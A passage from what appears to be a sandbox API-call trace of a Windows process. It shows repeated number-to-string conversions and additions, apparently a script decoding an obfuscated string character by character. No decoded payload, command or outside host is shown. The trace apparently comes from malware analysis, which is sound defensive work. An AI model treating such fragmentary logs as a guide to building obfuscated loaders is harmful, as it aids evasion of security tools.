lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x31\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.079] GetUserDefaultLCID () returned 0x409 [0047.079] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.079] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.080] GetUserDefaultLCID () returned 0x409 [0047.080] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x33\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x36\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.080] GetUserDefaultLCID () returned 0x409 [0047.080] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.080] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.081] GetUserDefaultLCID () returned 0x409 [0047.081] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x205cc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x35\x9d\xc9\xe3\xfe\x07", lpUsedDefaultChar=0x0) returned 1 [0047.081] GetUserDefaultLCID () returned 0x409 [0047.082] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.082] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.083] GetUserDefaultLCID () returned 0x409 [0047.083] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.083] GetUserDefaultLCID () returned 0x409 [0047.083] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.083] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.084] GetUserDefaultLCID () returned 0x409 [0047.084] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.084] GetUserDefaultLCID () returned 0x409 [0047.084] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.084] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.085] GetUserDefaultLCID () returned 0x409 [0047.085] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.085] GetUserDefaultLCID () returned 0x409 [0047.085] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.085] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.086] GetUserDefaultLCID () returned 0x409 [0047.086] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.086] GetUserDefaultLCID () returned 0x409 [0047.086] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.087] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.088] GetUserDefaultLCID () returned 0x409 [0047.088] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.088] GetUserDefaultLCID () returned 0x409 [0047.088] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.088] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.089] GetUserDefaultLCID () returned 0x409 [0047.089] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.089] GetUserDefaultLCID () returned 0x409 [0047.089] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.089] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.090] GetUserDefaultLCID () returned 0x409 [0047.090] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.090] GetUserDefaultLCID () returned 0x409 [0047.090] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.090] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.092] GetUserDefaultLCID () returned 0x409 [0047.092] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.092] GetUserDefaultLCID () returned 0x409 [0047.092] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.092] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.093] GetUserDefaultLCID () returned 0x409 [0047.093] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.093] GetUserDefaultLCID () returned 0x409 [0047.093] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.093] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.094] GetUserDefaultLCID () returned 0x409 [0047.094] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.094] GetUserDefaultLCID () returned 0x409 [0047.094] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.094] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.095] GetUserDefaultLCID () returned 0x409 [0047.095] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.096] GetUserDefaultLCID () returned 0x409 [0047.096] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.096] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.097] GetUserDefaultLCID () returned 0x409 [0047.097] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.097] GetUserDefaultLCID () returned 0x409 [0047.097] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.097] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.098] GetUserDefaultLCID () returned 0x409 [0047.098] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.098] GetUserDefaultLCID () returned 0x409 [0047.098] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.098] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.099] GetUserDefaultLCID () returned 0x409 [0047.099] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.099] GetUserDefaultLCID () returned 0x409 [0047.099] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.099] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.100] GetUserDefaultLCID () returned 0x409 [0047.100] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.100] GetUserDefaultLCID () returned 0x409 [0047.100] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.100] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.101] GetUserDefaultLCID () returned 0x409 [0047.101] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.101] GetUserDefaultLCID () returned 0x409 [0047.101] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.102] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.102] GetUserDefaultLCID () returned 0x409 [0047.102] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.103] GetUserDefaultLCID () returned 0x409 [0047.103] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.103] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.103] GetUserDefaultLCID () returned 0x409 [0047.103] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.104] GetUserDefaultLCID () returned 0x409 [0047.104] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.104] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.104] GetUserDefaultLCID () returned 0x409 [0047.104] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.104] GetUserDefaultLCID () returned 0x409 [0047.104] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.105] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.105] GetUserDefaultLCID () returned 0x409 [0047.105] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.105] GetUserDefaultLCID () returned 0x409 [0047.105] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.105] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.107] GetUserDefaultLCID () returned 0x409 [0047.107] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.107] GetUserDefaultLCID () returned 0x409 [0047.107] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.107] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.108] GetUserDefaultLCID () returned 0x409 [0047.108] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.108] GetUserDefaultLCID () returned 0x409 [0047.108] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.108] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.109] GetUserDefaultLCID () returned 0x409 [0047.109] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.110] GetUserDefaultLCID () returned 0x409 [0047.110] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.110] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.111] GetUserDefaultLCID () returned 0x409 [0047.111] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.111] GetUserDefaultLCID () returned 0x409 [0047.111] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.111] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.112] GetUserDefaultLCID () returned 0x409 [0047.112] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.112] GetUserDefaultLCID () returned 0x409 [0047.112] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.112] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.113] GetUserDefaultLCID () returned 0x409 [0047.114] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.114] GetUserDefaultLCID () returned 0x409 [0047.114] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.114] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.115] GetUserDefaultLCID () returned 0x409 [0047.115] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.115] GetUserDefaultLCID () returned 0x409 [0047.115] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.115] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.116] GetUserDefaultLCID () returned 0x409 [0047.116] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.116] GetUserDefaultLCID () returned 0x409 [0047.116] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.116] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.117] GetUserDefaultLCID () returned 0x409 [0047.117] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.118] GetUserDefaultLCID () returned 0x409 [0047.118] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.118] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.119] GetUserDefaultLCID () returned 0x409 [0047.119] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.119] GetUserDefaultLCID () returned 0x409 [0047.119] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.119] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.120] GetUserDefaultLCID () returned 0x409 [0047.120] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.120] GetUserDefaultLCID () returned 0x409 [0047.120] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.120] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.121] GetUserDefaultLCID () returned 0x409 [0047.121] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.121] GetUserDefaultLCID () returned 0x409 [0047.121] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.121] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.122] GetUserDefaultLCID () returned 0x409 [0047.122] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.123] GetUserDefaultLCID () returned 0x409 [0047.123] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.123] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.124] GetUserDefaultLCID () returned 0x409 [0047.124] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.124] GetUserDefaultLCID () returned 0x409 [0047.124] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.124] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.125] GetUserDefaultLCID () returned 0x409 [0047.125] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.125] GetUserDefaultLCID () returned 0x409 [0047.125] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.125] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.126] GetUserDefaultLCID () returned 0x409 [0047.126] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.126] GetUserDefaultLCID () returned 0x409 [0047.127] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.127] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.128] GetUserDefaultLCID () returned 0x409 [0047.128] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.128] GetUserDefaultLCID () returned 0x409 [0047.128] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.128] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.129] GetUserDefaultLCID () returned 0x409 [0047.129] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.129] GetUserDefaultLCID () returned 0x409 [0047.129] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.129] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.130] GetUserDefaultLCID () returned 0x409 [0047.130] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.131] GetUserDefaultLCID () returned 0x409 [0047.131] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.131] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.132] GetUserDefaultLCID () returned 0x409 [0047.132] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.132] GetUserDefaultLCID () returned 0x409 [0047.132] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.132] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.133] GetUserDefaultLCID () returned 0x409 [0047.133] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.133] GetUserDefaultLCID () returned 0x409 [0047.133] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.133] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.134] GetUserDefaultLCID () returned 0x409 [0047.134] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.134] GetUserDefaultLCID () returned 0x409 [0047.135] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.135] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.136] GetUserDefaultLCID () returned 0x409 [0047.136] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.136] GetUserDefaultLCID () returned 0x409 [0047.136] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.136] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.137] GetUserDefaultLCID () returned 0x409 [0047.137] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.137] GetUserDefaultLCID () returned 0x409 [0047.137] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.137] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.138] GetUserDefaultLCID () returned 0x409 [0047.138] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.139] GetUserDefaultLCID () returned 0x409 [0047.139] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.139] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.140] GetUserDefaultLCID () returned 0x409 [0047.140] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.140] GetUserDefaultLCID () returned 0x409 [0047.140] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.140] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.141] GetUserDefaultLCID () returned 0x409 [0047.141] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.141] GetUserDefaultLCID () returned 0x409 [0047.141] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.141] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.142] GetUserDefaultLCID () returned 0x409 [0047.142] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.143] GetUserDefaultLCID () returned 0x409 [0047.143] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.143] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.144] GetUserDefaultLCID () returned 0x409 [0047.144] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.144] GetUserDefaultLCID () returned 0x409 [0047.144] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.144] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.145] GetUserDefaultLCID () returned 0x409 [0047.145] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.145] GetUserDefaultLCID () returned 0x409 [0047.145] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.145] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.147] GetUserDefaultLCID () returned 0x409 [0047.147] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.147] GetUserDefaultLCID () returned 0x409 [0047.147] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.147] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.148] GetUserDefaultLCID () returned 0x409 [0047.148] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.148] GetUserDefaultLCID () returned 0x409 [0047.148] VarI2FromStr (in: strIn="103", 